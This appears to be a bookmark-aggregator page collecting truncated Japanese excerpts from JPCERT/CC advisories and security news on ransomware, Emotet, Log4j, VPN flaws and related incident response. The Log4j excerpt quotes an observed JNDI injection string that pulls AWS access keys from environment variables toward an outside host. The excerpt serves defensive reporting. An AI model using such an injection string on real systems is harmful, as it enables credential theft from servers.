侵入型ランサムウェア攻撃を受けたら読むFAQ
ランサムウェアを用いた攻撃は、一台から数台の端末の感染被害から、業務停止を引き起こす大規模な感染被害に至るものまでさまざまです。本FAQでは、企業や組織の内部ネットワークに攻撃者が「侵入」した後、情報窃取やランサムウェアを用いたファイルの暗号化などを行う攻撃の被害に遭った場合の対応のポイントや留意点などをFAQ形式で記載します。 JPCERT/CCでは、こうした攻撃を他のランサムウェアを用いた攻撃と区別し、「侵入型ランサムウェア攻撃」と呼びます。 ネットワーク内部の複数のシステムでファイルの拡張子が変わり開封できなくなった、自組織から窃取されたとみられるファイルを暴露する投稿が行われた、または攻撃者から通知が届いたなどの状況を確認している場合、この攻撃の被害を受けている可能性があります。被害に遭われた企業や組織のCSIRTおよび情報セキュリティ担当の方は、インシデント対応を進める上での参考
注意喚起や情報共有活動における受信者側の「コスト」の問題について ー情報発信がアリバイや成果目的の自己目的化した行為にならないためにー - JPCERT/CC Eyes
Top > “脆弱性”の一覧 > 注意喚起や情報共有活動における受信者側の「コスト」の問題について ー情報発信がアリバイや成果目的の自己目的化した行為にならないためにー JPCERT/CCも関わった、「サイバー攻撃被害に係る情報の共有・公表ガイダンス」[1]が今年3月に公表されました。このガイダンスでは、被害組織同士、あるいは被害組織と専門組織間のやり取りを通じた情報共有活動や被害公表をスコープとしており、主に被害組織が情報を発信する場合を中心に解説しています。他方で、多くの組織においては、情報共有活動において「情報を受け取る」側であることが大半です。また、情報共有活動に限らず、注意喚起情報など日々多くの情報を受け取っています。 今回はこの「情報の受け取り」に係る課題、特に、“自己目的化”した注意喚起や情報共有(提供)が受け取り手側にコストを与えてしまう問題点について解説し、より効果的な注
JPCERT/CCは、Internet Week 2016 ~ 2019にて「インシデント対応ハンズオン」と題し、標的型攻撃を受けた際のセキュリティインシデント(以下、インシデント)調査手法に関するハンズオンを行ってきました。受講者の方から高く評価していただいていた「インシデント対応ハンズオン」ですが、公開の要望が多かったため、この度、GitHub上でコンテンツを公開することとしました。コンテンツは以下のURLから確認できます。 Log Analysis Training https://jpcertcc.github.io/log-analysis-training 本コンテンツは実際の標的型攻撃の事例をもとに作成しており、攻撃者のネットワーク侵入時にどのような痕跡がログに残るか、また、侵入の痕跡を発見するためにどのようなログ取得設定が必要か、をシナリオに沿って理解できる内容になっていま
JPCERT-AT-2021-0050 JPCERT/CC 2021-12-11(新規) 2022-01-04(更新) I. 概要 更新: 2022年1月4日記載 現時点で不明な点もあることから、今後の動向次第で下記掲載内容を修正、更新する予定がありますので、関連情報への注視のほか、本注意喚起の更新内容も逐次ご確認ください。 次の更新を行いました。詳細は「III. 対策」を参照してください。 - Apache Log4jのバージョン2.17.1(Java 8以降のユーザー向け)、2.12.4(Java 7のユーザー向け)及び2.3.2(Java 6のユーザー向け)が公開されました JavaベースのオープンソースのロギングライブラリのApache Log4jには、任意のコード実行の脆弱性(CVE-2021-44228)があります。Apache Log4jが動作するサーバーにおいて、遠隔の第三
ここ最近、「サイバー攻撃被害が増加」といった報道や緊迫する国際情勢の動静を意識した情報発信が散見されます。JPCERT/CCにも各方面から「国内へのサイバー攻撃は増えていますか?」といった問い合わせをいただくことが増えてきました。 先日来、注意喚起等を行っているEmotetの感染被害急増など、特定の種類の攻撃被害は確かに増加していますが、これらの攻撃被害の増加の原因/背景について技術的に不正確な解説も見受けられ、正しく対策が行われない、または対策に必要な情報が適切に伝わらないことが危惧されます。今回は攻撃の「動向」というものをどのようにとらえ、社会全体で危機感を共有していくのか、JPCERT/CCの今の考え方を解説します。 攻撃の「増減」は立場によって見え方が異なる ①観測者による見え方の違い 一口に「サイバー攻撃」といっても、無差別にバラまかれるフィッシングメールやマルウェアに感染させる
なぜ、SSL-VPN製品の脆弱性は放置されるのか ~“サプライチェーン”攻撃という言葉の陰で見過ごされている攻撃原因について~ - JPCERT/CC Eyes
Top > “インシデント”の一覧 > なぜ、SSL-VPN製品の脆弱性は放置されるのか ~“サプライチェーン”攻撃という言葉の陰で見過ごされている攻撃原因について~ サイバーセキュリティを取り巻く「用語」は元々英語由来のものが多く、翻訳することで元々のニュアンスが消えてしまう場合や、そのまま「カタカナ語」として使われ、意味が伝わりにくい場合もあります。特に、新たな攻撃手法やリスクについて、行政やセキュリティ専門組織、メディアを通じた情報発信において多用される「キーワード」の意味が正しく伝わらなければ、見当違いな対策につながってしまう恐れがあります。 今回は「サプライチェーン攻撃」として取り上げられることがある、大企業の下請企業が侵入型ランサムウェア攻撃被害に遭うケースを「大企業のサプライチェーン」の観点ではなく、主な侵入原因であるSSL-VPN製品の脆弱性放置の問題というインシデント対応
攻撃者は、はじめに標的のECサイトの注文フォームに対し、不正なスクリプトを含んだ文字列を入力し、購入処理を行います(図1の①)。その結果、ECサイトの購入処理の部分にXSSの脆弱性が存在する場合、ECサイトの管理画面を閲覧した管理者は不正なスクリプトが実行され、クレデンシャル情報の窃取や、ECサイトへの簡素WebShellの設置などが行われます(図1の②~④)。その後、攻撃者によってECサイトにWebShellやユーザーの情報窃取を行うJavaScriptなどが設置されます。設置された“情報窃取JavaScript”によってECサイトを利用するユーザーのクレジットカード情報等を窃取され、“情報保存ファイル”としてECサイト内に保存されます(図1の⑤)。攻撃者は定期的なWebShellへのアクセスを行うことでこれらの情報を窃取していたと推測されます(図1の⑥)。 なお、攻撃者は、一連の攻撃の
マルウェアEmotetの感染再拡大に関する注意喚起
JPCERT-AT-2022-0006 JPCERT/CC 2022-02-10(新規) 2023-03-20(更新) I. 概要JPCERT/CCでは、2021年11月後半より活動の再開が確認されているマルウェアEmotetの感染に関して相談を多数受けています。特に2022年2月の第一週よりEmotetの感染が急速に拡大していることを確認しています。Emotetに感染しメール送信に悪用される可能性のある.jpメールアドレス数は、Emotetの感染が大幅に拡大した2020年に迫る勢いとなっています。詳細は後述する「V. 観測状況」をご確認ください。感染や被害の拡大を防ぐためにも、改めて適切な対策や対処ができているかの確認や点検を推奨します。 (更新: 2023年3月8日追記) 2022年11月以降、Emotetの感染に至るメールの配布は確認されていませんでしたが、2023年3月7日より配布
楽天グループが2023年10月2日、Webサーバーにsecurity.txtを設置し、脆弱性情報の受付窓口としてVDP(脆弱性開示プログラム)を開始したことがSNSで話題になった。同社広報はこれを事実だと認めた。 日本有数のIT企業である楽天グループが「Webサーバーにテキストファイルを設置?」「脆弱性情報の受け付けがなぜ関係するの」と思った人もいるだろう。このsecurity.txtは、米Apple(アップル)や米Google(グーグル)、米GitHub(ギットハブ)、米IBMなど、IT関連の製品やサービスを提供する海外企業はすでに導入しているものだ。 一方、国内企業でsecurity.txtを導入している企業は少ない。security.txtとは何か、脆弱性情報の受け付けとの関連性、国内企業ではなぜ普及していないのか、順番に見ていこう。 security.txtがセキュリティー向上につ
2022年4月20日、総務省、経済産業省、警察庁、NISCの連名にて、「サイバー攻撃被害に係る情報の共有・公表ガイダンス検討会の開催について」と題する報道発表が行われました。JPCERT/CCはこの検討会について、各省庁とともに事務局を担当する予定です。 JPCERT/CCがサイバー攻撃被害に係る情報の共有・公表ガイダンス検討会に事務局として参加 この検討にあたって、JPCERT/CCがこれまでどのような問題意識を持ち、論点整理や提言を行ってきたのか、2020年度に総務省調査研究事業としてJPCERT/CCが実施した「サイバー攻撃被害情報の共有と公表のあり方について」と題した調査・検討[1]の報告内容も踏まえて、簡単にご紹介したいと思います。 被害組織がお詫び? サイバー攻撃の被害組織がプレスリリースを出す場合、「お詫び」といった謝罪の言葉がよく用いられます。確かに、個人情報や営業秘密の漏
攻撃のファイルレス化やマルウェアの難読化が進むにつれて、ファイル単体で悪意の有無を判断することは難しくなっています。そのため、現在ではサンドボックスやAIなどを活用したマルウェア検知手法やEDRなどのマルウェア感染後の不審な挙動を検知する技術が一般化しています。それでも、インシデントレスポンスの現場ではウイルス対策ソフトでは検知できないマルウェアが見つかることが多々あります。このような未知のマルウェアが見つかると、同種のマルウェアがネットワーク内部に潜伏していることを網羅的に調査することになりますが、ウイルス対策ソフトでは検知できないため、1台ずつ手動で調査する必要があります。 このような問題を解決するためにJPCERT/CCでは、マルウェア検知をサポートする目的でYAMAというツールを作成し、公開しました。YAMAは、自身で作成したYARAルールを使用してメモリスキャンをすることが可能で
今年7月下旬以降、なりすましメールへの注意を促す呼びかけが相次いでいます。注意が相次ぐ背景にEmotetのスパム活動の再開が関係しているとみられ、ここではこれらの注意喚起情報についてまとめます。 7月下旬以降、不審メール注意の呼びかけ多数 7月下旬以降、不審メールに対する注意喚起が多数公開されている。以下はpiyokangoが確認したもの。 2020年7月28日 【重要】弊社社員を装った迷惑メールに関するお詫びと注意喚起(不二食品) 【重要】迷惑メールにご注意ください(沖縄MICEネットワーク) [PDF] 迷惑メール(なりすましメール)に関するご報告と注意喚起 (フルテック) 『なりすましメール』にご注意ください。(一般社団法人大阪府建築士事務所協会) 2020年7月29日 【緊急】たかおかストリートを装った不審なメールにご注意ください!!(末広開発) [PDF] 迷惑メール(配布活動の
MalDoc in PDF - 検知回避を狙って悪性なWordファイルをPDFファイルへ埋め込む手法 - - JPCERT/CC Eyes
JPCERT/CCは、7月に発生した攻撃に、検知回避を狙って悪性なWordファイルをPDFファイルへ埋め込む新しいテクニック(以降本記事ではMalDoc in PDFとする)が使用されたことを確認しました。今回は、使用されたMalDoc in PDFの詳細とその対策について解説します。 MalDoc in PDFの概要 MalDoc in PDFで作成されたファイルはPDFのマジックナンバーやファイル構造を持つにもかかわらず、Wordで開くことが可能なファイルとなります。このファイルをWordで開くことで、ファイルにMacroが設定されていた場合、VBSが動作し、悪性の挙動を行います。 なお、JPCERT/CCが確認した攻撃では、ファイルの拡張子は.docとして使用されていたため、Windowsの設定で.docの拡張子にWordが関連付けされている場合、MalDoc in PDFで作成され
GitHub - JPCERTCC/phishurl-list: Phishing URL dataset from JPCERT/CC
You signed in with another tab or window. Reload to refresh your session. You signed out in another tab or window. Reload to refresh your session. You switched accounts on another tab or window. Reload to refresh your session. Dismiss alert
(更新日時 2021年11月19日) 本記事は2021年5月時点の記事のため、古い内容が含まれます。 2021年1月のテイクダウン作戦により当時のEmotetは全て停止しましたが、2021年11月14日よりEmotetが活動を再開したことを確認しています。 2019年10月以降、日本国内にてEmotetの感染事例が急増し、JPCERT/CCではこれまで注意喚起の発行や感染が疑われる場合の調査手順を公開し注意を呼び掛けていました。 2021年1月にEuropolは欧米各国の共同作戦によるEmotetのテイクダウンを発表しましたが、以後、各国CERTのネットワークを介して被害者への通知を行うことが示されています。日本国内では引き続きEmotetの感染端末が存在しており、JPCERT/CCでは国内外の各国機関等と連携し、利用者へ通知をしています。 本ブログ記事では、2章、3章でEmotetのテイ
知人などを装ったメールで感染を広げるコンピューターウイルス「エモテット」について、先月から感染が再び増加傾向にあり、さらに今月に入ってクレジットカード情報を盗み取る新たな手口も確認されているとして、情報セキュリティーの専門機関が対策の徹底を呼びかけています。 コンピューターウイルス「エモテット」は、知人などを装って送られてきたメールの添付ファイルを開くなどして感染すると、端末内の連絡先やメールの内容を盗み取り、過去にやり取りした文書を引用するなどして、さらに別の人にメールを送信して広がっていくのが特徴です。 情報セキュリティーの専門機関「JPCERTコーディネーションセンター」によりますと、国内で端末が感染した可能性のあるメールアドレスの数は、ことし3月をピークにいったんおさまったものの、5月は増加に転じて5022件と、前の月から2倍余りになり、今月はさらに5月を上回るペースで推移していま
印刷する メールで送る テキスト HTML 電子書籍 PDF ダウンロード テキスト 電子書籍 PDF クリップした記事をMyページから読むことができます JPCERT コーディネーションセンター(JPCERT/CC)は11月6日、マルウェア「IcedID」の感染を狙う不正なメールが複数報告されているとして注意を呼びかけた。近年流行するマルウェア「Emotet」の感染を狙った攻撃方法に似ているという。 BlackBerryによると、IcedIDは2017年にIBMのセキュリティ研究者が発見したトロイの木馬型の不正プログラム。銀行やペイメントカード会社、モバイルサービスプロバイダー、オンライン小売り、給与計算ポータル、メールクライアントなど標的に、金融関連情報や資格情報などを窃取するという。 感染攻撃に使われる不正メールは10月下旬に流通し始め、11月3日頃から増加していると見られる。Twi
サイバー攻撃被害に係る情報の意図しない開示がもたらす情報共有活動への影響について - JPCERT/CC Eyes
はじめに 先日、JPCERT/CCが事務局として参加した、専門組織同士の情報共有活動の活性化に向けた「サイバー攻撃による被害に関する情報共有の促進に向けた検討会」の報告書が公開され、関連成果物のパブリックコメントが始まりました。 経済産業省 サイバー攻撃による被害に関する情報共有の促進に向けた検討会 https://www.meti.go.jp/shingikai/mono_info_service/sangyo_cyber/cyber_attack/index.html JPCERT/CCはこれまでに下記の取り組みを通じて、情報共有活動の促進に向けたルール整備に取り組んできました。 令和2年度総務省「サイバー攻撃の被害に関する情報の望ましい外部への提供のあり方に係る調査・検討の請負」の調査報告(2021年7月公開)[1] 「サイバー攻撃被害に係る情報の共有・公表ガイダンス」(2023年3
最恐ウイルス「エモテット」猛威◆再燃の裏側とロシアの影【時事ドットコム取材班】(時事通信) - Yahoo!ニュース
「世界で最も危険」と言われるコンピューターウイルス「Emotet(エモテット)」が猛威を振るっている。2021年1月に壊滅したと思われたが、1年もたたないうちに再拡大。日本国内では最盛期を大幅に上回る勢いで感染が広がった。エモテットとの関連は不明だが、トヨタ自動車がウイルスに感染させられた取引先部品メーカーのシステム障害で操業休止を余儀なくされるなど、サイバー攻撃は日本経済にも大きな被害を与える。なぜ再燃したのか。対策はあるのか。背景を探ると、ウクライナに侵攻したロシアとの関係も見え隠れした。(時事ドットコム編集部 横山晃嗣) 【写真】記者に届いたエモテット攻撃メール ◇残党が再構築? エモテットはパソコンからメールやID、パスワードを盗み出したり、別のウイルスに感染しやすくしたりするコンピューターウイルスで、2014年に初めて確認されて以来、日本を含む世界中に拡散した。欧米8カ国は21年
複数の被害組織での調査や攻撃活動の追跡が並行して行われており、今後、記載したもの以外の製品の脆弱性や通信先等のインディケータ情報を追記、更新する見込みですので、今後の情報更新もご確認ください。 I. 概要JPCERT/CCは、2022年5月以降におけるArray Networks Array AGシリーズの脆弱性を悪用する標的型サイバー攻撃に対する侵害調査を進めてきました。 Array Networks Array AGシリーズの脆弱性を悪用する複数の標的型サイバー攻撃活動に関する注意喚起 https://www.jpcert.or.jp/at/2023/at230020.html JPCERT/CCでは注意喚起に対するフィードバックや、サイバーセキュリティ協議会の活動を通じて、注意喚起に掲載した攻撃活動に関連すると考えられる活動を認識しました。「II. 攻撃活動の概要」の概要やインディケ
2020年7月17日頃より、マルウエア Emotet の感染に繋がるメールが配布されているとの情報が確認されています。Emotet は、情報窃取を行うだけでなく、感染端末から窃取した情報を用いてスパムメールを送信し、更に感染拡大を試みる機能などを有するマルウエアです。 2019年10月から、日本国内でも Emotet の感染事例が相次いでいた状況から、JPCERT/CCは注意喚起やブログを公開して注意を呼びかけました。その後、2020年2月以降、Emotet の感染に繋がるメールの配布は観測されず、Emotet の活動に大きな動きがない状況が継続していました。 今回観測されているメールも、以前と同様、添付ファイルまたは本文中にリンクを含むメールです。添付ファイルまたはリンクからダウンロードされるファイルを実行すると、マクロの有効化を促す内容が表示され、マクロを有効化すると、Emotet の
「能動的サイバー防御」は効果があるのか? ~注目が集まるoffensiveなオペレーションの考察~ - JPCERT/CC Eyes
Top > “その他”の一覧 > 「能動的サイバー防御」は効果があるのか? ~注目が集まるoffensiveなオペレーションの考察~ はじめに 昨年9月に「『積極的サイバー防御』(アクティブ・サイバー・ディフェンス)とは何か ―より具体的な議論に向けて必要な観点について―」というブログ記事[1]を公表したところ、多くの反響をいただきました。 この時に示したとおり、「積極的サイバー防御」「アクティブサイバーディフェンス」「能動的サイバー防御」といったさまざまな呼称の概念は経緯的にも、また、使う人/組織においても非常に多義的であり、定義することにあまり意味はありません。他方で、この1年ほどの間に国内において主に注目が集まっているのは、この多義的なもののうち、より侵害性のある手段を用いた、offensiveなオペレーション(※)です。今回はこうしたoffensiveなオペレーションについて、その
JPCERT-AT-2020-0031 JPCERT/CC 2020-08-03 I. 概要Sky 株式会社から SKYSEA Client View に関する脆弱性の情報 (CVE-2020-5617)が公開されました。SKYSEA Client View がインストールされている PC において、当該 PC にログイン可能なユーザにより、PC 上のシステム権限で任意のコード実行などが行われる可能性があります。 脆弱性の詳細は、次の URL を参照してください。 Sky株式会社 【重要】権限昇格の脆弱性に関する注意喚起(CVE-2020-5617) https://www.skygroup.jp/security-info/200803.html JVN#25422698 SKYSEA Client View に権限昇格の脆弱性 https://jvn.jp/jp/JVN25422698
【セキュリティ ニュース】JPCERT/CC、ログ解析の訓練コンテンツを公開 - 痕跡発見のコツも(1ページ目 / 全1ページ):Security NEXT
JPCERTコーディネーションセンターは、ログ解析のトレーニング用コンテンツを公開した。GitHubより入手できる。 同コンテンツは、システム管理者やセキュリティ窓口担当者をはじめ、インシデントの分析に関心があるユーザー向けに用意した教材。これまで「Internet Week」にて実施してきた「インシデント対応ハンズオン」が好評だったことから公開した。 実際に確認された標的型攻撃の事例をもとに、「Windows」の「イベントログ」に関する調査手法について解説。典型的な侵入手法で残存するログの痕跡や、それらを得るために必要となる事前設定、ログ調査のポイント、分析手法などを紹介している。 同センターはイベントログについて、デフォルトの設定だとインシデント調査に活用できる情報が少なく、軽視されがちであると指摘。しかし、あらかじめ適切に設定しておくことで、より重要な情報を記録することができるとして
サイバー救急センターの松本です。 2020年9月に入り、マルウェア「Emotet(エモテット)」の活動再開による攻撃メールの件数が急増していることをJSOCで確認しています。そのため、注意喚起を目的として、Emotetの観測状況と攻撃の手口と対策をご紹介します。 Emotetの検知数の急増 Emotetの手口 Emotetの対策 Emotetの検知数の急増について 2020年7月中旬ごろから再開したEmotetの活動が、2020年9月に入ってさらに活発になり、攻撃メールの配信量が急増しています。 図1は、JSOCにおけるEmotetの検知状況です。7月中旬以降、JSOCで監視しているセキュリティ機器での検知はありましたが、クラウド型のメール対策製品等で遮断していたため、セキュリティ機器での検知は比較的少ない状況でした。しかし、9月に入り、Emotetによる日本への攻撃メールの配信量が増え、
JPCERT/CCでは、2018年ごろから確認されているモバイル端末を対象とした情報窃取マルウェアの感染活動およびフィッシングサイトへ誘導するモバイル端末を狙った攻撃の増加を確認しています。加えて、海外のセキュリティ組織からマルウェアに感染している日本国内のモバイル端末に関する報告を受けており、多数のモバイル端末がマルウェアに感染していることを確認しています。 また、このようなモバイル端末を狙った攻撃に使用される不正なWebサイトの報告件数は、直近で5,000件を超えており増加しています(図1)。 多くのモバイル端末ユーザーが、マルウェア感染やフィッシングの被害に直面している状況を鑑み、JPCERT/CCでは、モバイル端末のマルウェア感染対策および感染後の対応方法についてよくある質問をまとめました。自身のモバイル端末でマルウェア感染が疑われる場合や、マルウェア感染の通知など受け取った場合は
ここ数年、世界中で猛威をふるっているコンピューターウイルス「エモテット」について、ことし7月中旬からの休止期間を経て、今月に入って国内でも活動が再開されたとして、情報セキュリティーの専門機関が注意を呼びかけています。 コンピューターウイルスの「エモテット」は、知人などを装って送られてきたメールの添付ファイルを開くなどして感染すると、端末内の連絡先やメールの内容を盗み取り、過去にやり取りした文書を引用するなどして、さらに別の人にメールを送信して広がっていくのが特徴です。 ここ数年、世界中で猛威を振るい、国内では、ことし春に感染がピークを迎えたあと、7月中旬からは観測されず、休止期間に入ったと見られていました。 情報セキュリティーの専門機関「JPCERTコーディネーションセンター」によりますと、今月2日、エモテットに感染させようとするメールの配布が、およそ3か月ぶりに観測されました。 新たな手
Malware Analysis Operations(MAOps)の自動化 - JPCERT/CC Eyes
日々発生するインシデント調査を効率化するために、分析を自動化することは、すべてのマルウェア分析者が取り組んでいる課題ではないかと思います。クラウドを中心とした技術(CI/CDやサーバーレス、IaCなど)は、MAOpsを効率的に自動化することができる素晴らしいソリューションです。今回は、JPCERT/CCで行っているクラウド上でのマルウェア分析の自動化方法について、以下の事例をもとに紹介します。 Malware C2 Monitoring Malware Hunting using Cloud YARA CI/CD system Surface Analysis System on Cloud Memory Forensic on Cloud Malware C2 Monitoring C2サーバーを監視することは、攻撃者の活動を理解する上で重要なため、多くのマルウェア分析者は日ごろから行っ
JPCERT/CCでは、2024年3月からインシデント対応に関する相談や情報提供を受け付ける窓口の運用を開始しています。この窓口では、被害組織からだけではなく、調査を支援するセキュリティベンダー、システム運用会社など被害組織以外からも受け付けており、実際にセキュリティベンダーなどから相談をいただいています。 インシデント相談・情報提供(被害組織/保守・調査ベンダー向け) https://www.jpcert.or.jp/ir/consult.html この窓口の運用がスタートして、まだ3カ月しか経過していませんが、今回はどのような相談が来ているのかについて紹介します。この内容をご覧いただき、どのような内容をJPCERT/CCに相談できて、実際にどのような対応をJPCERT/CCがするのか参考にしてもらえればと思います。 セキュリティベンダーよりランサムウェア攻撃への対応方法の相談 1つ目に
Apache Log4j2のRCE脆弱性(CVE-2021-44228)を狙う攻撃観測 - JPCERT/CC Eyes
また、JPCERT/CCのハニーポットでは観測されていませんが、AWSのアクセスキー情報を環境変数から窃取しようとする以下の攻撃文字列が存在していることも確認しています。 ${jndi:ldap://${env:AWS_ACCESS_KEY}.(略)} 被害の確認および対処 log4j2は採用事例が非常に多く、また自身がlog4jをプログラムに取り込んだ覚えがなくとも、使用しているライブラリ内に内包されているケースも多くあるものと考えられます。影響確認においては、自組織で用いられているソフトウェア資産の整理もさることながら、既に不正なアクセスが行われているという想定のもと、システム内に不審なファイル等が配置されていないか、また不審な宛先に対して通信が発生していないか確認し、冷静にシステムのアップデートまた回避策の適用を実施していただきたいと思います。 参考情報 [1] Log4j Apac
Fortinet 社製 FortiOS の SSL VPN 機能の脆弱性 (CVE-2018-13379) の影響を受けるホストに関する情報の公開について
HOMECyberNewsFlashFortinet 社製 FortiOS の SSL VPN 機能の脆弱性 (CVE-2018-13379) の影響を受けるホストに関する情報の公開について (1) 概要 JPCERT/CC は、2020年11月19日以降、Fortinet 社製 FortiOS の SSL VPN 機能の脆弱性の影響を受けるホストに関する情報が、フォーラムなどで公開されている状況を確認しています。当該情報は、FortiOS の既知の脆弱性 (CVE-2018-13379) の影響を受けるとみられるホストの一覧です。この一覧は、攻撃者が脆弱性を悪用可能であることを確認した上で作成したものとみられ、ホストの IP アドレスに加え、SSL VPN 接続を利用するユーザーアカウント名や平文のパスワードなどの情報が含まれているとのことです。 JPCERT/CC は、当該情報に日本の
JPCERT-AT-2023-0014 JPCERT/CC 2023-08-01(新規) 2023-08-18(更新) I. 概要2023年7月20日から、株式会社ノースグリッドはオンラインストレージ構築パッケージ製品「Proself」の認証バイパスおよびリモートコード実行の脆弱性に関する情報を公開しています。すでに多くの利用組織が本件の調査や対応を進めている状況であると認識していますが、まだ本件を確認できていない利用組織が存在している可能性を危惧し、本注意喚起を公開し、本製品の販売や提供、運用や保守などを行う利用組織に対しても問題の認識や調査、対策実施を呼び掛けることにいたしました。 株式会社ノースグリッド [至急]Proselfのゼロディ脆弱性による攻撃発生について https://www.proself.jp/information/149/ 同脆弱性を悪用する攻撃がすでに確認されて
はじめに このブログ「TSUBAMEレポート Overflow」では、四半期ごとに公表している「インターネット定点観測レポート」の公開にあわせて、レポートには記述していない海外に設置しているセンサーの観測動向の比較や、その他の活動などをまとめて取り上げていきます。 今回は、TSUBAME(インターネット定点観測システム)における2022年10~12月の観測結果についてご紹介します。日本国内のTSUBAMEにおける観測状況と代表的なポート番号宛に届いたパケットの状況について週次でグラフを公開していますので、そちらもぜひご覧ください。 Mirai型パケットの送信元地域別TOP5の推移について TSUBAMEで観測したMirai型の特徴を持つパケットの送信元地域別IPアドレス数のTOP5について日毎の推移のグラフを図1に、総数とTOP5の推移を図2に示します。 Mirai型パケットの送信はすべて
JPCERT-AT-2021-0034 JPCERT/CC 2021-08-11 I. 概要マイクロソフトから同社製品の脆弱性を修正する2021年8月のセキュリティ更新プログラムが公開されました。これらの脆弱性を悪用された場合、リモートからの攻撃によって任意のコードが実行されるなどの可能性があります。マイクロソフトが提供する情報を参照し、早急に更新プログラムを適用してください。 マイクロソフト株式会社 2021 年 8 月のセキュリティ更新プログラム https://msrc.microsoft.com/update-guide/ja-JP/releaseNote/2021-Aug マイクロソフト株式会社 2021 年 8 月のセキュリティ更新プログラム (月例) https://msrc-blog.microsoft.com/2021/08/10/202108-security-upda
2020年12月4日、MITRE社と国内の2組織から、CNA(CVE Numbering Authority)について発表がありました。 The MITRE Corporation LINE Added as CVE Numbering Authority (CNA) Mitsubishi Electric Added as CVE Numbering Authority (CNA) LINE株式会社 LINEがCVE Numbering Authority(CNA)の一員に 三菱電機株式会社 製品セキュリティーへの取組 この発表を受けて、CNAとCVE(Common Vulnerabilities and Exposures)に関して、また関連するJPCERT/CCの活動の近況についてお話します。 CNAの役目は、個別製品の脆弱性に対して、識別子番号CVEを採番して割り当てることです。C
【セキュリティ ニュース】Fortinet製VPN使う脆弱なホスト情報が公開 - 平文パスワードなども(1ページ目 / 全2ページ):Security NEXT
JPCERTコーディネーションセンターは、既知の脆弱性が修正されていないFortinet製品を利用するホストのリストが公開されているとして注意を呼びかけた。国内の情報も含まれている。 「FortiOS」の「SSL VPN」に明らかとなった脆弱性「CVE-2018-13379」の影響を受けるホストの情報が公開されていることが判明したもの。同センターによると、ホストのIPアドレスにくわえて、ユーザーアカウント名、平文のパスワードなどの情報も含まれるという。 同脆弱性を悪用されると、「SSL VPN」経由で組織ネットワークの内部へ侵入され、情報の窃取やマルウェアを感染させるといった攻撃を受けるおそれがある。脆弱なVPN機器は、被害が拡大する二重恐喝型ランサムウェアの感染経路としても指摘されており、特に注意が必要だ。 同脆弱性に関しては、これまでも国内において探索行為が確認されており、2019年9
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
ログ分析トレーニング用コンテンツの公開 - JPCERT/CC Eyes
Apache Log4jの任意のコード実行の脆弱性(CVE-2021-44228)に関する注意喚起
最近の”サイバー攻撃の動向”に関する情報発信について思うこと - JPCERT/CC Eyes
Emotet感染確認ツール「EmoCheck」v2.1をJPCERT/CCが公開、2月に更新された挙動の変化に対応 旧バージョンで感染確認できなくても再チェックを
ECサイトのクロスサイトスクリプティング脆弱性を悪用した攻撃 - JPCERT/CC Eyes
楽天が公開サーバーにテキスト設置、セキュリティー向上に役立つ「security.txt」
JPCERT/CC、フィッシングサイトのURLデータセットを公開、GitHubレポジトリで
サイバー攻撃被害情報の共有と公表のあり方について - JPCERT/CC Eyes
カスタマイズ可能なマルウェア検知ツールYAMA - JPCERT/CC Eyes
7月下旬以降相次ぐ不審メール注意喚起についてまとめてみた - piyolog
11月に入りマルウェア「Emotet」の感染に至るメールが観測される、JPCERT/CCが注意喚起 特定のフォルダーにコピーしてから実行するよう促すxlsファイルも
マルウェアEmotetのテイクダウンと感染端末に対する通知 - JPCERT/CC Eyes
「エモテット」感染 再び増加傾向 新たな手口も 対策徹底を | NHK
国内でマルウェア「IcedID」が拡散か--Emotetに類似
日本の組織を標的にした外部からアクセス可能なIT資産を狙う複数の標的型サイバー攻撃活動に関する注意喚起
マルウエア Emotet の感染に繋がるメールの配布活動の再開について (追加情報)
SKYSEA Client View の脆弱性 (CVE-2020-5617) に関する注意喚起
【注意喚起】猛威をふるっているマルウェアEmotet検知数の急増と対策について | LAC WATCH
モバイル端末を狙うマルウェアへの対応FAQ - JPCERT/CC Eyes
IPAやJPCERT/CCより先に連絡を ~ Microsoft がバウンティハンターへ呼びかけ | ScanNetSecurity
「エモテット」国内でも約3か月ぶり観測 知人装うメールに注意 | NHK
インシデント相談・情報提供窓口対応状況 - JPCERT/CC Eyes
Proselfの認証バイパスおよびリモートコード実行の脆弱性に関する注意喚起
TSUBAMEレポート Overflow(2022年10~12月) - JPCERT/CC Eyes
2021年8月マイクロソフトセキュリティ更新プログラムに関する注意喚起
CNA活動レポート 〜日本の2組織が新たにCNAに参加〜 - JPCERT/CC Eyes
note.com/chidaism
search.app
e-earphone.blog
qiita.com/m_masashi
www.google.com
www.kochinews.co.jp